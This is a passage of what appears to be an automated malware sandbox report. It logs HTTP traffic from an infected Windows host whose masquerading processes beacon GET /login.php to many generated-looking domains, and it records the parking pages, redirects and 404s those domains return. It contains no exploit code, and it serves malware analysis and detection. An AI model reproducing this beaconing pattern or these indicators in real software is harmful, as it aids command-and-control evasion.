                                                                                                                                                                                                                  Data Ascii: ackground-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#ff
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520489931 CET1236INData Raw: 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32
                                                                                                                                                                                                                  Data Ascii: transform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.521085978 CET1236INData Raw: 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72
                                                                                                                                                                                                                  Data Ascii: ;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-he
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.521099091 CET1236INData Raw: 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30
                                                                                                                                                                                                                  Data Ascii: ne}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.531991959 CET1236INData Raw: 34 59 53 69 36 46 34 4d 61 4b 68 41 54 6b 6f 43 77 42 4f 66 71 47 35 61 77 3d 3d 22 2c 22 74 69 64 22 3a 22 33 30 39 37 22 2c 22 62 75 79 62 6f 78 22 3a 74 72 75 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69 73 63 6c 61
                                                                                                                                                                                                                  Data Ascii: 4YSi6F4MaKhATkoCwBOfqG5aw==","tid":"3097","buybox":true,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"https://sedo.com/search/details/?partnerid=14460


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 54730 | 199.59.243.227 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:50:58.888362885 CET | 404 | OUT | GET /login.php?subid1=20241112-0450-586c-82c6-824410e64c84 HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww25.lyxynyx.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: __tad=1731347439.3564880; parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
Nov 11, 2024 18:50:59.314130068 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1230
                                                                                                                                                                                                                  x-request-id: 961815cc-8c8d-41a4-b210-66bae6edcecb
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_gxX4uwSvW7ewWmeXquExbzweJwJXh6Dt0wdaPig23rcdoLc2tYdGy8xZNu9R4HNw0iexKGT3ftFy2kzvnVUpYw==
                                                                                                                                                                                                                  set-cookie: parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b; expires=Mon, 11 Nov 2024 18:05:59 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 53764 | 72.52.179.174 | 80 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:01.220251083 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
47 | 192.168.2.6 | 53766 | 72.52.179.174 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:01.741349936 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 53772 | 162.255.119.102 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.183851004 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
Nov 11, 2024 18:51:02.686229944 CET | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 53773 | 99.83.170.3 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.210110903 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
Nov 11, 2024 18:51:02.644588947 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 53774 | 44.221.84.105 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.229973078 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Nov 11, 2024 18:51:02.652961016 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347462|1731347428|17|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.6 | 53777 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.431566000 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Nov 11, 2024 18:51:02.851334095 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 11628aaa-9c01-4922-bd02-36f0e302c140
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:02 GMT
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:51:02.851399899 CET | 520 | IN
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDYyLCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 53776 | 208.100.26.245 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.490645885 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:51:02.871604919 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:51:09.178250074 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:51:09.281229019 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.6 | 52119 | 3.94.10.34 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.645026922 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Nov 11, 2024 18:51:03.076699018 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347463|1731347428|17|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.6 | 52122 | 199.59.243.227 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.676589012 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Nov 11, 2024 18:51:03.122396946 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: f0a3a827-a1a8-4766-bafa-4589935061b4
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:03 GMT
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:51:03.122451067 CET | 520 | IN | Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDYzLCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.6 | 52123 | 208.100.26.245 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.676775932 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:51:03.128988981 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:51:10.638961077 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:51:10.742697954 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:10 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.6 | 52121 | 44.221.84.105 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.676995039 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Nov 11, 2024 18:51:03.122596025 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347463|1731347428|17|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.6 | 52124 | 162.255.119.102 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.687438011 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
Nov 11, 2024 18:51:03.214816093 CET | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.6 | 52125 | 178.162.203.226 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:02.687581062 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
